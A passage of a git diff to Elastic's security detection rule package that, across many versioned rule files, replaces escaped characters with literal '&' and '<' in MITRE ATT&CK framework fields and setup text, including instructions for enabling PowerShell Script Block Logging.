ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json index 15775a0461c..65f3756520b 100644 --- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_103.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json index 1dceb80438f..c473e51bf4b 100644 --- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_104.json @@ -58,7 +58,7 @@ ], "risk_score": 73, "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json index 0f94816a3d2..24504db80cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json +++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_105.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "9092cd6c-650f-4fa3-8a8a-28256c7489c9", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json index af760a40b95..095899c0633 100644 --- a/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json +++ b/packages/security_detection_engine/kibana/security_rule/9092cd6c-650f-4fa3-8a8a-28256c7489c9_106.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json b/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json index 4896ccdaa92..f9939762da3 100644 --- a/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json +++ b/packages/security_detection_engine/kibana/security_rule/90babaa8-5216-4568-992d-d4a01a105d98_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json index 4ade8bc1320..2a5d28194e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_103.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json index 65448f51656..51014a3286d 100644 --- a/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/9180ffdf-f3d0-4db3-bf66-7a14bcff71b8_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json index bb46a6c666f..a032f070fad 100644 --- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json +++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_102.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json index aad9da176b0..059f6c2cc21 100644 --- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json +++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json index a8de9acedb1..0483bea8966 100644 --- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json +++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json index f868d9f87c3..073b8a4dc7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json +++ b/packages/security_detection_engine/kibana/security_rule/91d04cd4-47a9-4334-ab14-084abe274d49_205.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json index c9ee08c3941..5d71a2dacef 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json index 356b91bb67b..834a5566db6 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_102.json @@ -27,7 +27,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json index 5a58a9ae4c8..7eea440cad5 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8d77-07827ac4cee0_103.json @@ -37,7 +37,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json index ffaa85cd294..84b542d2312 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json index ed61d8464fa..39648dc1773 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_102.json @@ -27,7 +27,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json index f755f38176f..e2f6046b413 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f55-07827ac3acc9_103.json @@ -37,7 +37,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json index 57fdc8f88fe..e9abaceebec 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json index 452568773a1..c061e9a04dc 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_102.json @@ -27,7 +27,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json index 2636ad1a3ef..1b6fa46db79 100644 --- a/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/91f02f01-969f-4167-8f66-07827ac3bdd9_103.json @@ -37,7 +37,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json index b70527b44fb..e074eabc5a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_2.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json index 9fcaa18a8be..59df8df6487 100644 --- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_3.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json index 846c2ba0a03..c205de5ce80 100644 --- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_4.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json index 293bbab9c4a..05336f81791 100644 --- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_5.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json index 9b81f29efb3..0ec88cd7e4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_6.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json index 44476cd350d..a369d40560f 100644 --- a/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json +++ b/packages/security_detection_engine/kibana/security_rule/92984446-aefb-4d5e-ad12-598042ca80ba_7.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "92984446-aefb-4d5e-ad12-598042ca80ba", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json index d10b1104de0..ee4809b60f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json +++ b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_5.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json index 20f08a97e91..cd7c944996d 100644 --- a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json +++ b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_6.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json index 5d65a49c865..1c3def6c57a 100644 --- a/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json +++ b/packages/security_detection_engine/kibana/security_rule/92a6faf5-78ec-4e25-bea1-73bacc9b59d9_7.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json index 08a36c81a98..f2a2ee1a71f 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json index 9d9bf69b2e4..aa4b3dd206d 100644 --- a/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json +++ b/packages/security_detection_engine/kibana/security_rule/93075852-b0f5-4b8b-89c3-a226efae5726_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + 